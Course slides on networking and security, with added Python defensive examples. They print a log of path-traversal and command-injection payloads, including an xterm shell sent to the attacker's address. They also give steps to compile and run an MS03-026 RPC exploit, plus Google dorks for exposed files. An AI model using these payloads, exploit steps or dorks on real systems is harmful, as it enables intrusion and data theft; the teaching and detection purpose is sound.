Computer Networking and Security
Rudi Lumanto
STMIK Nusa Mandiri
November 2008
References and contact info

Glenn Berg, "Networking Essentials", New Riders
Deborah Russell, G.T. Gangemi Sr., "Computer Security Basics", O'Reilly & Associates
John E. Canavan, "Fundamentals of Network Security", Artech House
Internet

Contact: Rudi Lumanto, [email protected], 0815-1036-9754
Assessment criteria

Assignments (2-4 reports): 20%
Mid-term exam: 30%
Attendance: 10%
Final exam: 40%
Syllabus

- Overview
- Network standards (OSI)
- Network components
- Network protocol (TCP/IP)
- Network OS and services
- Network/Internet security
- Software threats: virus, worm etc.
- Internet threats: TCP attack, DNS, DoS etc.
- Firewall and intrusion detection system (IDS)
- Cryptography and its applications
- VPN
Computer Networking and Security: overview (course map figure)

Overview; network security standards; network components; protocol (TCP/IP); network OS and services; Internet threats: TCP attack, DoS, DNS etc.; software threats: virus, worm etc.; firewall and IDS; cryptography and applications; VPN.
1. Overview

Outline
- Simple cases and tools
- Why computer networking, and why security?
- Computer security goals
- Threats, vulnerabilities, attacks
- Policy and measure
- Making a good security policy

Simple cases and tools (seeing the technique/information behind a case)
A security case

A company called "Acme-art, Inc." does online business on the Internet. It has a database that records all customer information, including their credit card information, connected to its site www.acme-art.com, which is protected by a firewall. On 31 October 2001 a hacker intruded into the system and stole all the credit card information, then posted it to a Usenet newsgroup. Within a few hours the company had lost millions of dollars and its reputation, and had to invest much more money to keep the business alive.

What happened? How could it happen?

Fact: a firewall is installed, and Internet access to the site can only be made through HTTP on port 80.
Security team investigation: sample case 1

Looking for clues in the web server log file (parts A to F are discussed below):

A
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 3452
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 8468
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 6912
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891

B
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 52640
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 652
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel.jpg HTTP/1.0" 200 36580

C
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272

D
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358

E
10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358

F
10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1228
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228
Security team investigation: sample case 1, reading the log part by part

Part A (03:02:47): browsing. The visitor from 10.0.1.21 fetches the front page and its thumbnail images.

Part B (03:03:13 to 03:03:18): still browsing. index.cgi takes a "page" parameter (falls.shtml, tahoel.shtml) and includes the named file in its output.

Part C (03:03:41): trying direct access to /cgi-bin/. The server answers with an error response (403 Forbidden), so the directory itself cannot be listed.

Part D (03:03:41 to 03:05:31): attacking. The visitor requests index.cgi without a parameter and then with an empty value (page=) to see how the Perl script handles the parameter. Security hole 1: there is no validation of the "page" parameter before it is passed on to the index.cgi Perl script.

Part E (03:06:21): attacking through security hole 1. With page=/../../../../../../../../../etc/passwd the script walks up the directory tree and returns the server's passwd file with status 200.

Effect of security hole 1: recovering the important "passwd" file:

root:x:0:0:root:/root:/bin/bash
………………
Lion:x:500:500::/home/lion:/bin/bash

Part F (03:07:01 and 03:17:29): attacking through security hole 2, direct execution of commands on the server. The value |ls+-la+/%0aid%0awhich+xterm| (decoded: "|ls -la /", newline, "id", newline, "which xterm|") runs three commands and returns their output in the page. Ten minutes later, |xterm+-display+10.0.1.21:0.0+%26| (%26 decodes to "&") starts an xterm on the server in the background with its display sent back to the attacker's machine 10.0.1.21, which gives the attacker an interactive shell on the web server. A value wrapped in "|" being executed as a command is the behaviour of Perl's two-argument open(), so the "page" value was evidently handed to open() unchanged. Note that none of this needed anything but HTTP on port 80: the firewall did its job and was irrelevant to the attack.
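What the log review and the missing input check look like in code, as an added example that is not part of the original slides or of the Acme-art case. The sample lines below are a constructed, cleaned copy of parts A to F in condensed form; the detector decodes each query value the way the CGI would have seen it and tags traversal, shell metacharacters and sensitive file names; safe_page_path shows the check index.cgi lacked. The document root /srv/www/html and the rule that "page" must be a plain name.shtml are assumptions for illustration.

```python
import os
import re
from urllib.parse import unquote

# NCSA common log format, as used in the Acme-art excerpt on the slides.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Constructed sample: a cleaned copy of parts A to F of the case-study log.
SAMPLE_LOG = """\
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272
10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358
10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358
10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1228
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228
"""


def decode_param(raw):
    """Decode a query value the way the CGI sees it: '+' is a space, %XX a byte."""
    return unquote(raw.replace('+', ' '))


def classify(target):
    """Return indicator tags for one request target (path plus query string)."""
    tags = []
    path, _, query = target.partition('?')
    if path.rstrip('/') == '/cgi-bin':
        tags.append('cgi-bin-probe')
    for pair in query.split('&') if query else []:
        name, _, value = pair.partition('=')
        value = decode_param(value)               # split on '&' first, so an encoded %26 survives
        if value == '':
            tags.append('empty-param:' + name)    # probing how the script handles a blank value
        if '../' in value or '..\\' in value:
            tags.append('path-traversal:' + name)
        if value.startswith('|') or value.endswith('|') or any(c in value for c in '\n;&`'):
            tags.append('shell-meta:' + name)     # pipes, newlines and other command separators
        if '/etc/passwd' in value:
            tags.append('sensitive-file:' + name)
    return tags


def analyse(log_text):
    """Parse a log; return (time, ip, target, status, tags) for suspicious lines only."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                               # not common log format; skip the line
        tags = classify(m['target'])
        if m['status'] == '403':
            tags.append('forbidden')
        if tags:
            findings.append((m['time'], m['ip'], m['target'], int(m['status']), tags))
    return findings


# --- The check index.cgi lacked (closes security hole 1 and 2) ---------------
PAGE_NAME = re.compile(r'^[A-Za-z0-9_-]+\.shtml$')   # assumed allow-list: a plain name.shtml


def safe_page_path(page, docroot='/srv/www/html'):
    """Return the file to include for ?page=..., or None if the value is not acceptable.

    The allow-list already rejects '/', '..' and '|', so neither traversal nor a
    pipe can reach open(); the realpath check is a second line of defence that
    still holds if the pattern is loosened later.
    """
    if not PAGE_NAME.match(page):
        return None
    root = os.path.realpath(docroot)
    full = os.path.realpath(os.path.join(root, page))
    if os.path.commonpath([root, full]) != root:
        return None
    return full


if __name__ == '__main__':
    for time, ip, target, status, tags in analyse(SAMPLE_LOG):
        print(time, ip, status, target, ' '.join(tags))
    for value in ('falls.shtml', '/../../../../etc/passwd', '|ls -la /|'):
        print(repr(value), '->', safe_page_path(value))
```

Run against the sample, the detector reports the /cgi-bin/ probe, the empty parameter, the traversal to /etc/passwd and the two command injections, and nothing for the legitimate browsing; the same decoding step (splitting on "&" before percent-decoding) is what lets it see the backgrounding "&" hidden as %26 in the last line.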
Information/technique behind the case

- Understanding of computers and networks
- Information about the target
- HTTP structure
- CGI/Perl
- Linux system and its commands

httpd default file structure: what is the web site structure? (host Lisv01)

/ (root)
  home/
    u01/, u02/, u03/, …
      public_html/        (default user's directory)
  var/
    www/
      html/               (default document root*)
    log/
      httpd/
  etc/
    httpd/
      conf/
        httpd.conf        (file)
    init.d/
      httpd               (file)
  sbin/  bin/  dev/  usr/  …

* Document root: the directory that holds HTML documents.
Behind the Web: three places where application code runs (figure)

Client-side application: the WWW server software sends HTML and script (JavaScript) over the Internet/intranet to the WWW browser, and the browser executes the application.

Network-loading application: the WWW server software delivers an application (Java applet, ActiveX) that is loaded over the network and executed inside the WWW browser.

Server-side application: the browser's request makes the WWW server software execute an application on the server (CGI, Active Server Pages) and return the result. The index.cgi of sample case 1 is a server-side application of this kind.
Sample case 2

After a period of new recruitment, a server in a company suddenly crashed. The company network became unavailable for a while, and this led to a large loss in production.

What happened? How could it happen?

No indication in the log files!!!
Security team investigation: looking for clues by social engineering

Sample case 2

One new employee installed Windows 2000 Server on his computer and connected it to the LAN with a global (public) IP address.

Other clues:
1. Nessus report on vulnerabilities in Windows 2000
2. Exploit program available

Nessus report: analysis of host 192.168.27.31 (Windows 2000 Server after IIS installation)

Address of host   Port/Service            Issue regarding port
192.168.27.31     ftp (21/tcp)            Security hole found
192.168.27.31     smtp (25/tcp)           Security hole found
192.168.27.31     http (80/tcp)           Security hole found
192.168.27.31     nntp (119/tcp)          Security hole found
192.168.27.31     msrpc (135/tcp)         Security hole found
192.168.27.31     netbios-ssn (139/tcp)   Security hole not found
192.168.27.31     https (443/tcp)         Security hole not found
192.168.27.31     microsoft-ds (445/tcp)  Security hole found
……                ….                      ….
Nessus report in detail (sample case 2)

Other references: IAVA:2003-A-0012
Nessus ID: 11835

Vulnerability, msrpc (135/tcp):
The remote host is running a version of Windows which has a flaw in its RPC interface which may allow an attacker to execute arbitrary code and gain SYSTEM privileges. There is at least one worm which is currently exploiting this vulnerability, namely the MSBlaster worm.
Solution: see http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
Risk factor: high
CVE: CAN-2003-0352
BID: 8205
Other references: IAVA:2003-A-0011
Nessus ID: 11806

Warning, msrpc (135/tcp): Distributed Computing Environment (DCE) services running on the remote host.

Nessus ID: identity number of the vulnerability check in Nessus.
BID: Bugtraq ID: related documentation regarding the vulnerability, including exploit code; see the SecurityFocus site.
Simulation

1. Download the exploit source file (from the SecurityFocus site or the Whoppix CD):
   $ cp /KNOPPIX/pentest/exploits/securityfocus/8205/oc192-dom.c .
2. Compile the source file:
   $ gcc oc192-dom.c
3. Run the exploit against the IP address of the target machine:
   $ ./a.out -d 192.168.94.204

Result: SYSTEM-level access on the target, as a remote command prompt:
   C:\WINNT\SYSTEM32>
Information/technique behind the case

- Understanding of the network
- Insufficient security orientation for new employees
- Lack of knowledge about the OS
- There is always exploit code on the Internet
- Lack of information about updates (patches)
Why computer networks?

1. File sharing: allows a file to be accessed at any time and from anywhere.
2. Effective data transfer: fast and efficient delivery of data.
3. Hardware sharing: one printer, hard disk etc. can be used jointly.
4. Real-time communication: communication via text, audio, images or video in real time.
5. Operational cost reduction: reduces telephone charges, paper use, postage etc.
File/information resource sharing

Information resources: printer, data, files.
- Users can share a printer connected to the LAN; there is no need to connect a printer to each computer.
- Users can share data on the computers: a user on computer C can handle files on computer B as if they were his own files.
Effective data transfer

- The data transmission speed is tens to several hundred Mbps. For example, an A4-sized document (30 Kbytes, i.e. 240,000 bits) can be transmitted over a 10 Mbps LAN in 0.024 seconds.

bps (bits per second): the unit rate at which data can be transmitted over a communication line, expressed as the number of bits transmitted per second. 9600 bps means 9600 bits are transmitted in one second.
Hardware sharing

- Effective use of hardware (printer, hard disk etc.)
- Easy to add new computers or relocate existing computers
- Easy to connect computers of different vendors
Example of network use: seat reservation network

- Inquiries are issued from various places
- They are connected to the seat reservation database on the central computer
- Answers to the inquiries are generated immediately
- The database is updated and a ticket is issued in the same step

Examples of similar systems: money withdrawal, balance inquiry etc.
Types of network

Mainly divided into two types based on their scale (the area that a network covers).
- LAN (local area network) is implemented within a building or factory.
- WAN (wide area network) is implemented by connecting two or more LANs between offices and laboratories, or between two countries.
Why computer security?

- To protect company/individual assets: hardware, software and INFORMATION (data, ability and reputation)
- To gain a competitive advantage: how many people would use a bank's Internet banking system if they knew that the system had been hacked in the past?
- To comply with regulatory requirements
- To keep your job
Computer security goals: Confidentiality, Integrity, Availability

Confidentiality: prevention of unauthorized access to data, and of accidental data disclosures.

Integrity: prevention of improper modifications of the data, either intentionally or accidentally:
1) modification of the data by unauthorized parties;
2) operation on data by authorized personnel in ways that are incompatible with the nature (syntax) of the data, leading to its corruption;
3) any modification to append-only records, to alter their evidential value.

Availability: measures to protect data should not result in making it difficult to access and modify the data in the ways in which it was intended.
Threats, vulnerabilities and attacks

Threats: anything that can disrupt the operation, functioning, integrity or availability of a computer system.

- Stand-alone threats: threats that arise without any connection to another system. Examples: virus, password cracker.
- Connection threats: threats that arise because of the connection to other systems.
Threats arising from connection to other computers

Information leaks: a database of customer information, including credit card numbers, is leaked from an Internet service provider.
Falsification: the contents of the web site of a public institution are rewritten with the political messages of a dissident group.
Denial of service: a bookshop site is attacked and its server goes down, discontinuing service.
Impersonation: an intruder fakes a membership site for the purchase of merchandise.
Attack platform: a corporate network administering a server used as a platform for attacking other sites was sued for compensation for the damage caused.
Vulnerabilities

Weakness in the design, configuration or implementation of a computer system that renders it susceptible to a threat.

1. Poor design: hardware and software systems that contain design flaws that can be exploited. Example: sendmail flaws in early versions of Unix that allowed hackers to gain privileged root access.
2. Poor implementation: systems that are incorrectly configured because of inexperience, insufficient training or sloppy work. Example: a system that does not have restricted access privileges on critical executable files.
3. Poor management: inadequate procedures and insufficient checks and balances. Example: no documentation and no monitoring.

Critical vulnerabilities and vulnerability scanning

Certain security vulnerabilities are declared critical when they are (or are about to be) actively exploited and represent a clear and present danger. Upon notification of a critical vulnerability, systems must be patched by a given date or they will be blocked from network access.
Types of vulnerability (examples)

OS/program name | Cause | Influence
Index Server (Windows NT), Index Service (Windows 2000) | ISAPI extension idq.dll overflow | Local system permission seized by an outsider
telnetd (FreeBSD 4.3 and earlier, Red Hat 7.1 and earlier, etc.) | Buffer overflow during AYT optional packet processing | telnetd permission (normally root) seized by an outsider
sadmind (Solaris 2.3 – 7) | Buffer overflow during NETMGT_PROC_SERVICE request processing | Command executable with root permission by an outsider
SSH 1.2.31, OpenSSH 2.2 and earlier | Overflow in an int variable in the detect_attack function | Command executable with root permission by an outsider
dtspcd (AIX 4.3/5.1, HP-UX 11.11, Solaris 8, etc.) | Buffer overflow in a shared library | Arbitrary command executable with root permission by an outsider
BIND 8.2.x (Red Hat, Turbolinux, Solaris, AIX, etc.) | Buffer overflow during TSIG processing | Operation permission (normally root) seized by an outsider
wu-ftpd 2.6.0 and earlier (Red Hat Linux 6.2 and earlier, etc.) | Format string bug in the site-exec and setproctitle functions | Execution permission (normally root) seized by an outsider
IIS 4.0 (Windows NT), IIS 5.0 (Windows 2000) | Access to a file outside the root directory permitted when the path name is Unicode | Shell command executed with IUSR_Machinename permission by an outsider
Attacks

A specific technique used to exploit a vulnerability. Example: the threat could be a denial of service, the vulnerability is in the design of the OS, and the attack could be a "ping of death".

- Passive attacks: gathering information by monitoring and recording traffic on the network, or by social engineering. Examples: packet sniffing, traffic analysis.
- Active attacks: overt actions on the computer system.
Denial of service (figure)

From an attack platform the attacker starts the attack, sending to the target host either a large volume of data or packets that cause a system crash; the target host's service goes down due to overload.
Policy and measure

Security trinity: the foundation for all security policies and measures that an organization develops and deploys.

What is security? Definitions from the American Heritage Dictionary:
- Freedom from risk or danger: safety.
- Measures adopted … to prevent a crime.

Security → prevention.

Computer security measures: mechanisms to prevent, detect and recover from threats and attacks, or for auditing purposes.
Key point

Computer security is not only a technical problem; it is a business and people problem. The technology is the easy part; the difficult part is developing security policies/plans that fit the organization's business operation and getting people to comply with the plan.

Social engineering: non-technical methods hackers employ to gain access to a system; it refers to the process of convincing a person to reveal information.
Security operations

- Prevention against accidental capture or modification of information
- Detection of all improper access to data and system resources
- Recovery from unauthorized access: restoring data values, system integrity etc.

Policies and procedures

- User privileges
- Data backup
- Security tools to deploy
- Monitoring integrity
- Response to incidents
- User roles, etc.
Types of users

Hacker: a user who tries to obtain access using advanced knowledge and techniques.
Cracker: a user who attempts sabotage and other subversive activities with malicious motives.
Script kiddy: a user who has little technical capability and uses tools available on the Internet when attempting cyber attacks.

(Figure: the vulnerabilities of the corporate network are the entry point for intrusion, subversion and sabotage by these users.)
Integrity check tool (figure)

/etc/passwd file → hash value (MD5): dc577ef5f97b671781c04425737bc4df
After file editing/falsification → hash value: b0ed782bbd4c8445f07538a3ede788eb
Mismatch … altered!!
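A minimal integrity checker in the spirit of the figure, added here as an example that is not from the slides. It hashes a constructed passwd file, stores the digest as a baseline, and reports the mismatch after the file is altered and again after it is deleted. SHA-256 is used instead of the MD5 shown on the slide because MD5 is no longer collision-resistant; the file contents and the temporary paths are constructed for the demonstration.

```python
import hashlib
import os
import tempfile


def file_digest(path, algo='sha256'):
    """Hash a file in chunks; SHA-256 rather than the MD5 shown on the slide."""
    h = hashlib.new(algo)
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(65536), b''):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(paths, algo='sha256'):
    """Record the trusted digest of each file (store this copy off-host or read-only)."""
    return {'algo': algo, 'files': {p: file_digest(p, algo) for p in paths}}


def verify(baseline):
    """Re-hash every baselined file; report 'ok', 'altered' or 'missing' per path."""
    algo = baseline['algo']
    report = {}
    for path, expected in baseline['files'].items():
        if not os.path.isfile(path):
            report[path] = 'missing'
        elif file_digest(path, algo) != expected:
            report[path] = 'altered'
        else:
            report[path] = 'ok'
    return report


def demo():
    """Constructed scenario: baseline a fake passwd file, tamper with it, then remove it."""
    workdir = tempfile.mkdtemp()
    passwd = os.path.join(workdir, 'passwd')
    with open(passwd, 'w') as f:                 # constructed content, modelled on the slide
        f.write('root:x:0:0:root:/root:/bin/bash\n')
        f.write('lion:x:500:500::/home/lion:/bin/bash\n')
    baseline = build_baseline([passwd])
    before = verify(baseline)[passwd]
    with open(passwd, 'a') as f:                 # the falsification: a second UID-0 account
        f.write('backdoor:x:0:0::/tmp:/bin/bash\n')
    after = verify(baseline)[passwd]
    os.remove(passwd)
    gone = verify(baseline)[passwd]
    os.rmdir(workdir)
    return before, after, gone


if __name__ == '__main__':
    print(demo())
```

The check is only as good as the baseline: if the intruder who edits /etc/passwd can also edit the stored digests, the tool reports "ok". Keep the baseline on read-only media or on another host, and run the verification from a trusted binary, which is how Tripwire and AIDE are meant to be deployed.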
Security tools and security products (figure): countermeasures against hacking

A malicious user on the Internet meets, in turn, the corporate network perimeter and then the servers and clients behind it.

Network security: router (filtering), firewall (VPN), N-IDS (network intrusion detection system), vulnerability audit
Server security: H-IDS (host intrusion detection system), log monitoring, falsification prevention, vulnerability audit
Miscellaneous: virus scan, encryption (SSH)
Firewall? (figure)

The firewall sits between the Internet and the intranet. A public WWW server and a public FTP server are exposed to Internet clients; the flows in the figure are ① HTTP from an Internet client to the public WWW server, ② HTTP, ③ FTP to the public FTP server, ④ HTTP from an intranet client, and ⑤ an unspecified application between a client and a server, the kind of traffic the firewall exists to control. A gateway-type firewall can also authenticate the client before relaying its connection.

Firewall technologies:
- Packet filtering
- Application gateway
- Stateful inspection
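A Python model of the difference between two of the three technologies listed, packet filtering and stateful inspection, applied to flows like those in the figure; this is an added example and not part of the slides. Addresses, ports and the packet sequence are constructed (RFC 5737 documentation ranges, and 10.0.0.0/24 as the intranet); the application gateway is not modelled.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    sport: int
    dport: int
    syn: bool = False       # True for the first packet of a TCP connection


# Assumed addresses for the illustration, not from the slides.
PUBLIC_WWW = '203.0.113.10'     # public WWW server, reachable on 80/tcp
PUBLIC_FTP = '203.0.113.11'     # public FTP server, reachable on 21/tcp
INTRANET_PREFIX = '10.0.0.'     # intranet clients and servers
INBOUND_ALLOWED = {(PUBLIC_WWW, 80), (PUBLIC_FTP, 21)}


def is_intranet(addr):
    return addr.startswith(INTRANET_PREFIX)


class PacketFilter:
    """Stateless packet filtering: each packet is judged on its own header fields.

    To let replies to intranet clients come back in, such a filter needs a rule
    like 'allow inbound if the source port is 80 or 21', which is exactly the
    rule an attacker satisfies by choosing that source port.
    """
    def allow(self, p):
        if is_intranet(p.src):
            return True                                   # outbound traffic
        if (p.dst, p.dport) in INBOUND_ALLOWED:
            return True                                   # to the public servers
        if is_intranet(p.dst) and p.sport in (80, 21):
            return True                                   # the 'reply' rule, the weak spot
        return False


class StatefulFilter:
    """Stateful inspection: inbound packets pass only as replies to tracked connections."""
    def __init__(self):
        self.connections = set()          # (client, cport, server, sport) seen opening

    def allow(self, p):
        if (p.dst, p.dport, p.src, p.sport) in self.connections:
            return True                                   # reply to a known connection
        if is_intranet(p.src) and p.syn:
            self.connections.add((p.src, p.sport, p.dst, p.dport))
            return True                                   # intranet opens outbound
        if (p.dst, p.dport) in INBOUND_ALLOWED and p.syn:
            self.connections.add((p.src, p.sport, p.dst, p.dport))
            return True                                   # Internet opens to public server
        return False


def run_scenarios():
    """Constructed packets; returns {label: (stateless_verdict, stateful_verdict)}."""
    stateless, stateful = PacketFilter(), StatefulFilter()
    client, web, attacker = '10.0.0.5', '198.51.100.7', '198.51.100.66'
    scenarios = [
        ('client opens HTTP to Internet web server', Packet(client, web, 40000, 80, syn=True)),
        ('web server reply to that connection',      Packet(web, client, 80, 40000)),
        ('attacker, source port 80, to client 445',  Packet(attacker, client, 80, 445)),
        ('Internet client opens HTTP to public WWW', Packet(attacker, PUBLIC_WWW, 51000, 80, syn=True)),
        ('Internet client to intranet SSH',          Packet(attacker, client, 51001, 22, syn=True)),
    ]
    return {label: (stateless.allow(p), stateful.allow(p)) for label, p in scenarios}


if __name__ == '__main__':
    for label, (a, b) in run_scenarios().items():
        print(f'{label:45} stateless={a!s:5} stateful={b}')
```

Both filters pass the legitimate flows and block the unsolicited SSH attempt; the difference is the third scenario, where a packet from the Internet with source port 80 aimed at a file-sharing port on an intranet host is let through by the stateless rule set and dropped by the stateful one, because no intranet host ever opened a connection to that source.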
Encryption: VPN (Virtual Private Network) (figure)

A VPN over the Internet behaves like a leased line, e.g. using IPsec or IPv6. Each site connects through a FW/VPN router, a remote access user connects through the same kind of tunnel, and the communication between sites and users is encrypted as it crosses the providers (Provider A, B, C, D) and the Internet exchange (IX) in between.
Making a good security policy

- Penetration test/ethical hacking: understanding what is inside the hacker's mind
- Security trinity
- Security goals
Definition of "ethical hacking"

Ethical hacking is where a computer and network expert attacks a security system on behalf of its owners, seeking vulnerabilities that a malicious hacker could exploit. To test a security system, ethical hackers use the same methods as their less principled counterparts, but report problems instead of taking advantage of them. Ethical hacking is also known as penetration testing, intrusion testing, and red teaming. An individual involved in ethical hacking is sometimes called a white hat, a term that comes from old Western movies, where the "good guy" wore a white hat and the "bad guy" wore a black hat.

One of the first examples of ethical hacking at work was in the 1970s, when the United States government used groups of experts called red teams to hack its own computer systems. According to Ed Skoudis, Vice President of Security Strategy for Predictive Systems' Global Integrity consulting practice, ethical hacking has continued to grow in an otherwise lackluster IT industry, and is becoming increasingly common outside the government and technology sectors where it began. Many large companies, such as IBM, maintain employee teams of ethical hackers.
Inside the hacker's mind

- Focus on the target: attack successfully and stay safe.
- Never use your own information.
- Never leave your footprints.
- Be able to come back again.

Hacker's procedure
Hacker's procedure/steps

1. Information gathering: targeting, scanning
2. Attack, intrusion: remote attack, local attack
3. Unauthorized act
4. Actions taken after the unauthorized act: log removal/deception, space using, time stamps, back door
Example of targeting: all information about the target

Technique name: web browser targeting
Goal: personal information about the target
Operation base: any web browser with a search engine site (Google); online databases (WHOIS, IP conversion, etc.)
Information sought: location, related company/organization, news, telephone number, contact (mail address), the web author's ideas/thoughts/behaviour, site software
Targeting with Google

By using the basic search techniques combined with Google's advanced operators, anyone can perform information gathering and vulnerability searching using Google. This technique is commonly referred to as Google hacking.
Google hacking: mastering Google using its standard options

- Double quotation marks: the keyword is recognized as a phrase
- Hyphen (-): exclude pages that contain the keyword
- site: search only inside the given site
- *: wildcard; use inside double quotation marks to match any word in the indicated position
- intitle: search limited to the web page title
- inurl: search limited to the web page URL
- intext: search limited to the main body text of the web page
- filetype: search restricted to a file extension
- phonebook: search for a telephone number
Google hacking: the options in use

site: search only inside the site.
  "hacker" site:www.cnn.com   or   site:www.cnn.com hacker
  This query searches for the word hacker, restricting the search to the http://www.cnn.com web site: how many pages on the CNN web server contain the word hacker?

*: wildcard, used inside double quotation marks to match any word in the indicated position.
  "He is a * Hacker"

intitle: search limited to the web page title.
  intitle:"Hacker"

inurl: search limited to the web page URL.
  inurl:www.securityfocus.com

intext: search limited to the main body text of the web page.
  intext:"earthquake"

filetype: search restricted to a file extension.
  "hacking" filetype:ppt
  "whoppix" filetype:iso

phonebook: search for a telephone number.
  phonebook:John Doe CA
More on Google hacking: searching inside sites for content that was not meant to be public

Finding directory listings on servers

Directory listings provide a list of files and directories in a browser window instead of the typical text-and-graphics mix generally associated with web pages. These pages offer a great environment for deep information gathering.

Most directory listings begin with the phrase "Index of", which also shows in the title. An obvious query to find this type of page might be

  intitle:index.of

which may find pages with the term "index of" in the title of the document. Unfortunately, this query will return a large number of false positives, such as pages with the following titles:

  Index of Native American Resources on the Internet
  LibDex—Worldwide index of library catalogues
  Iowa State Entomology Index of Internet Resources

Combining Google options in queries

Several alternative queries that provide more accurate results:

  intitle:index.of "parent directory"
  intitle:index.of name size

These queries indeed provide directory listings by not only focusing on index.of in the title, but on keywords often found inside directory listings, such as parent directory, name, and size. Obviously, this search can be combined with other searches to find files or directories located in directory listings.

Examples:

  Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data"
  Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data" intitle:bbs
  bbs.dat inurl:"Index of" intitle:"Index of"

Example: searching for address databases in CSV files, focusing on Japanese sites:

  filetype:csv address site:jp

Example: searching for address databases in Excel files, focusing on UK sites:

  filetype:xls address site:uk
Thank you

The Dawn of the Net